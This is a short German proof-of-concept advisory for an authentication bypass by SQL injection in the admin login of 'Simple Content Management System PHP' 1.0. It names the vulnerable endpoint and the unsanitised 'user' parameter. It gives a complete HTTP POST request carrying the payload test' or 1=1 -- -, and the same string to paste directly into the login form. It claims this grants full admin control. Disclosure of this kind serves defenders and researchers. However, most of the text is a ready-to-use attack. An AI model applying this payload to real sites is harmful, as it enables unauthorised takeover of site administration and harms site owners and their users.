
Proof-of-Concept für die Umgehung der Authentifizierung per SQL-Injection im Simple Content Management System PHP, das nicht authentifizierten Angreifern ermöglicht, über einen manipulierten Benutzerparameter Administratorzugriff zu erlangen.
Eine SQL-Injection-Schwachstelle besteht auf der Admin-Login-Seite des
einfachen Content-Management-Systems PHP. Der Parameter user wird
nicht bereinigt, bevor er an die SQL-Abfrage übergeben wird, wodurch ein
nicht authentifizierter Angreifer die Authentifizierung umgehen und vollen
Admin-Zugriff erlangen kann.
/web/admin/login.phpusercode-projects.org
Einfaches Content-Management-System PHP
1.0
POST /web/admin/login.php HTTP/1.1
Host: [target]
Content-Type: application/x-www-form-urlencoded
user=test'+or+1%3D1+--+-&password=test&submit=Login
oder fügen Sie dies einfach auf der Login-Seite hinzu

test' or 1=1 -- -

Ein nicht authentifizierter Remote-Angreifer kann den Admin-Login vollständig umgehen, ohne Zugangsdaten zu kennen, und erhält die volle Kontrolle über das Admin-Panel, einschließlich des Hinzufügens von Inhalten.
Imad Alvi